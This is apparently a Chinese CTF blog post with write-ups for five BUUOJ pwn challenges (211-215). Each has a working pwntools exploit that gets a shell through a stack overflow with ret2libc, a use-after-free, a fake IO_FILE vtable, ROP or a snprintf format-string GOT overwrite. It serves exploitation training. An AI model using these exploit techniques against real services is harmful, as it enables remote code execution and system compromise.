buuoj Pwn writeup 211-215

最新推荐文章于 2022-05-22 12:56:23 发布
最新推荐文章于 2022-05-22 12:56:23 发布
阅读量403 收藏
点赞数
分类专栏: CTF 文章标签: 栈溢出 Use-After-Free 格式字符串漏洞 函数重载 内存管理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/119046749
版权

211 rootersctf_2019_babypwn

在这里插入图片描述
在这里插入图片描述说白了就个栈溢出。

exp

from pwn import*

context.log_level = "debug"

r = remote('node4.buuoj.cn', 27601)
#r = process("./211")

elf = ELF('./211')
libc = ELF('./64/libc-2.27.so')


puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

pop_rdi = 0x401223
main_addr = 0x401146
ret_addr = 0x40101a

r.recvline()

payload = 'a' * 0x108 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
#gdb.attach(r)

r.send(payload)

puts_addr = u64(r.recvuntil("\x7f")[-6:].ljust(8, '\x00'))


libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search('/bin/sh').next()
print hex(libc_base)
print hex(system_addr)
print hex(bin_sh)

#payload = 'a' * 0x108 + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
payload = 'a' * 0x108 + p64(pop_rdi) + p64(bin_sh) + p64(ret_addr) + p64(system_addr)
r.sendline(payload)

r.interactive()

212 hctf2016_fheap

在这里插入图片描述要注意到got表是可以写的。

功能就两个。

create
在这里插入图片描述构造了一个单列表。

delete
在这里插入图片描述
没有清理指针,显然会有uaf
我们思路就是利用uaf的两层结构,先通过patrail write将free低字节覆盖,爆破,改成printf的plt表,泄露地址。

同样的手法,将free改成system。然后get shell。

exp

from pwn import *
 
context.log_level = 'debug'
libc = ELF('./64/libc-2.23.so')
 
def add(size,content):
   r.sendlineafter('3.quit','create ')
   r.sendlineafter('size:',str(size + 1))
   r.sendafter('str:',content + '\x00')
 
def delete(index):
   r.sendlineafter('3.quit','delete ')
   r.sendlineafter('id:',str(index))
   r.sendlineafter('Are you sure?:','yes')
 
def exploit():
   add(0x10,'a'*0x10) #0
   add(0x10,'b'*0x10) #1
   delete(1)
   delete(0)

   add(0x20,'%22$p'.ljust(0x18,'b') + p16(0x59D0)) 
   delete(1)
   r.recvuntil('0x')
   libc_base = int(r.recvuntil('b',drop = True),16) - libc.symbols['_IO_2_1_stdout_']
   system_addr = libc_base + libc.sym['system']
   print 'libc_base=',hex(libc_base)

   add(0x10,'a'*0x10) #1
   add(0x10,'b'*0x10) #2
   delete(2)
   delete(1)
   add(0x20,'/bin/sh;'.ljust(0x18,'a') + p64(system_addr))
   delete(2)
 
while True:
   try:
      global r
      r = remote('node4.buuoj.cn',29315)
      exploit()
      r.interactive()
   except:
      r.close()
      print 'trying...'

213 pwnable_seethefile

在这里插入图片描述在这里插入图片描述对文件的一些操作,有打开,读取,写,关闭。
退出的时候会将名字留一下。
name这里可以造成溢出。

open
在这里插入图片描述
不能直接打开flag文件,只能随便打开一个文件然后读一下。

read

在这里插入图片描述
只能读0x18,然后内容放在magicbuf。

write
在这里插入图片描述内容打印出来。

close
在这里插入图片描述
这就是平平无奇关闭。

发现name下面有fp
在这里插入图片描述

我们可以修改fp。所以现在剩下的问题就是怎样去伪造一个IO_FILE来得到flag。

当我们构造好IO_FILE之后可以利用IO_close来get shell。
怎样对IO_CLOSE进行分析。
IO_FILE_fclose

可以利用的有很多,可以利用缓冲区的刷新,可以利用__finish。

要做的就是找一个放IO_FILE的地方,改掉fp,首先伪造IO_FILE一些没用的东西。

改掉flag,指向的文件用sh或者$0都可以。

vtable指针就写后面地址,然后把vtable里面的指针干脆都写成system算了。
exp

# -*- coding: utf-8 -*-
from pwn import *

context.log_level = "debug"

r = remote("node4.buuoj.cn", "29022")
#r = process("./213")

elf = ELF("./213")
libc = ELF("./libc_32.so.6")

def Open(name):
	r.sendlineafter("Your choice :", "1")
	r.sendlineafter("What do you want to see :", name)

def read():
	r.sendlineafter("Your choice :", "2")

def show():
	r.sendlineafter("Your choice :", "3")

Open("/proc/self/maps")

read()
show()
read()
show()
#因为每次读取大小有限,只能分两次读取


r.recvline()
libc_base = int(r.recvline()[:8], 16) - 0x1ad000
system_addr = libc_base + libc.symbols['system']
print "libc_base = " + hex(libc_base)

fake_addr = 0x0804b300

payload = 'a'*32 #padding
payload += p32(fake_addr) #fp

payload += '\x00' * (0x80-4)
payload += '\xff\xff\xdf\xff||sh'.ljust(0x94,'\x00')

#vtable
payload += p32(fake_addr+0x98)
payload += p32(system_addr)*23

r.sendlineafter("Your choice :", "5")
r.sendlineafter("Leave your name :",  payload)


r.interactive()

214 mrctf2020_easyrop

在这里插入图片描述

在这里插入图片描述
奇奇怪怪。

在这里插入图片描述开的栈的大小是784

2的函数
在这里插入图片描述可以输入0x300个

输入7之后不仅可以跳出循环,还会有溢出。
在这里插入图片描述所以就先填满,然后溢出就好了。

我们还发现了一个莫名其妙的sys函数。
在这里插入图片描述看起来好像就一个puts,但是我们发现它的汇编语句有一块是永远不会达到的。

在这里插入图片描述
所以我们溢出之后就跳到这里就好了。

要注意因为远程环境有点问题,没有回显,所以我们要用sleep防止数据包粘连。

exp

from pwn import *

context.log_level = "debug"


r = remote('node4.buuoj.cn',29859)

r.sendline("2")
sleep(1)
r.send('a'*0x300)
#gdb.attach(a)
r.sendline("7")
sleep(1)
r.send('a'*18+p64(0x000000000040072A))


r.interactive()

215 bbctf_2020_fmt_me

在这里插入图片描述
在这里插入图片描述
显然是一个snprintf格式化字符串的漏洞。
先介绍一下snprintf函数。

C 库函数 int snprintf(char *str, size_t size, const char *format, …) 设将可变参数(…)按照 format 格式化成字符串,并将字符串复制到 str 中,size 为要写入的字符的最大数目,超过 size 会被截断。

首先我们要先让它循环起来。
那么循环的话因为不能劫持fini.array
只能去劫持system的got表了。

在劫持system的got表为main函数之后,那么我们再怎么去利用,可以把snprintf或者其他函数的got表劫持,但是还是会用到system,system里面又放着main函数的地址,这个问题怎么解决?

我们重新装在system函数,所以我们劫持snprintf的got表,里面写入system函数的装载地址,让它重新装载一次,就好了。

exp

# -*- coding: utf-8 -*-
from pwn import *

r = remote('node4.buuoj.cn', 26287)

elf = ELF('./215')

payload1 = fmtstr_payload(6,{elf.got['system']:elf.sym['main']},write_size='long')
#64位  fmtstr_payload pwntools的这个工具是可以直接使用的
#学会了学会了

r.sendlineafter('Choice: ','2')
r.sendlineafter('Good job. I\'ll give you a gift.',payload1)

payload2 = '/bin/sh;'
#不能影响正常的后面字符串的输入,所以不能是'\x00'

payload2 += fmtstr_payload(7,{elf.got['snprintf']:0x401056-8},write_size='long')

r.sendlineafter('Choice: ','2')
r.sendlineafter('Good job. I\'ll give you a gift.',payload2)

r.sendlineafter('Choice: ','2')
r.sendlineafter('Good job. I\'ll give you a gift.','Yongibaoi')

r.interactive()
yongbaoii
关注
专栏目录
BUUCTF:[Black Watch 入群题]PWNwrite up)
qq_44768749的博客
08-23 930
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 376
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
Buuoj Pwn
VisualNull的博客
05-22 284
babyrop WP 一道比较简单的ret2libc 考察点为strlen函数遇到\x00返回 但是有一个坑 IDA逆向拿到伪代码 main函数 逻辑是程序开始运行时读入一个随机数 然后传给并调用sub_804871F函数 sub_804871F函数 a1为main函数传入的随机数(buff) 格式化后将a1给了s 之后从终端读入数据给buf 然后将数组buf的某个元素变为0(这是一个坑) 之后获取buf的长度(strlen函数) 这里是第一个利用..
buuoj pwn
FFY's Blog
10-07 1081
ret2text rip pwntools gdb 调试 gdb.debug(’./xxx’) pause() 在弹出窗口设好断点,用 python 传递不可打印字符 堆栈平衡,简单溢出 from pwn import * #context.log_level='debug' #p=remote('node3.buuoj.cn',27864) #p=gdb.debug('./pwn1') #pause() target_addr=0x401186 ret_addr=0x401016 pay='a'*(
BUUOj PWN 121-140
2h4ox1n9
12-17 135
121、ciscn_2019_final_5 122、picoctf_2018_are you root 123、[BJDCTF 2nd]diff 124、bjdctf_2020_YDSneedGrirlfriend 125、judgement_mna_2016 126、gyctf_2020_document 127、护网杯_2018_gettingstart 128、xman_2019_format
buuoj Pwn wp 1-10
yongbaoii的博客
01-09 677
01 test_your_nc 直接连上就好了。 然后 cat flag 。 02 rip ret2text. 这题多多少少有点问题。 IDA里面是这样的,但是exp一直有问题,然后试着连上直接跑,是这样的。 栈溢出到返回地址就行。 from pwn import* r = remote("node3.buuoj.cn",26737) context.log_level = "debug" system_addr = 0x401187 payload = 'a' * 23 + p64(syste
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 632
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2529
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
初学pwn-攻防世界(level0)
天柱的博客
08-27 1016
初学pwn-writeUp 攻防世界的第三道题目,level0。 首先还是先创建场景,使用nc进入远端,发现输出了一个Hello,World,之后什么都没有了,使用ls也没有反应,说明这需要我们获取shell了。 下载文件,先用checksec查看一下 这里简单介绍一些checksec这个工具: 1、Relro:No Relro(重定位表只读)   Relocation Read Only, 重定位表只读。重定位表即.got 和 .plt 两个表。   RELRO会有No RELRO、Partial RE
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 624
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3227
前言 开始刷一刷Buuctf的PWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
pwn学习-BUUOJ(一)
qq_45653588的博客
12-20 549
文章目录0x00 test_your_nc0X01 rip0x02 warmup_csaw_20160x03 pwn1_sctf_20160x04 ciscn_2019_n_1 0x00 test_your_nc 下载文件查看,直接就给了shell,没什么好说的,直接连上就行了。 int __cdecl main(int argc, const char **argv, const char **envp) { system("/bin/sh"); return 0; } 0X01 rip 下载文
buuoj Pwn writeup 241-245
yongbaoii的博客
08-31 330
241 [GKCTF 2021]checkin 逻辑也比较简单。 首先输入密码的时候可以有个溢出,但是只能溢出八个字节,就只能是做一个栈迁移。 然后有个检查,首先你的名字需要是admin,然后你的密码要走一个函数。 我们去看看那个函数。 好像很复杂。 0x4007f6那个函数点开。 瞬间明白是一个md5. 所以逻辑很简单,我们输入的密码通过md5加密之后要跟v4吻合。 我们发现密码admin的md5加密结果是那个。 所以就直接栈迁移就行。 栈迁移呢需要我们在bss上写东西,输入用户名可以做到,然后呢还
buuoj Pwn writeup 271-275
yongbaoii的博客
09-06 332
271 espcially_tu_2016 就是一个栈溢出。 但是这个题最麻烦的是他scanf之后居然缓冲区里面有一个回车,导致我们gets的时候失败了,所以我们就gets了两次。 为了看看是scanf的问题还是ios_c99scanf的问题,做了个小实验。 编译的时候记得加-std=c89 但是发现scanf也是一样的效果。 就是会留下一个回车。 那我们试试读入字符串。 还是会有一个回车。 那我们下面再放一个scanf 再走第二个scanf的时候会刷新缓冲区的指针。 那如果放的是gets 跑程序的时
buuoj Pwn writeup 66-70
yongbaoii的博客
02-23 286
66 ciscn_2019_final_3 保护 67 mrctf2020_shellcode 保护 68 hitcontraining_magicheap 保护 69 pwnable_start 保护 70 wustctf2020_getshell_2 保护
BUU PWN(一)
playmaker的博客
01-28 2152
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 431
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道题能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
buuoj Pwn writeup 116-120
yongbaoii的博客
05-11 260
116 roarctf_2019_realloc_magic 117 [BJDCTF 2nd]rci 118 wustctf2020_number_game 119 picoctf_2018_are you root 120 [GKCTF2020]Domo
buuoj Pwn writeup 221-225
yongbaoii的博客
08-31 924
221 starctf2018_babystack 222 xm_2019_awd_pwn2 223 jarvisoj_level6 224 hctf2018_the_end 225 inndy_onepunch
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值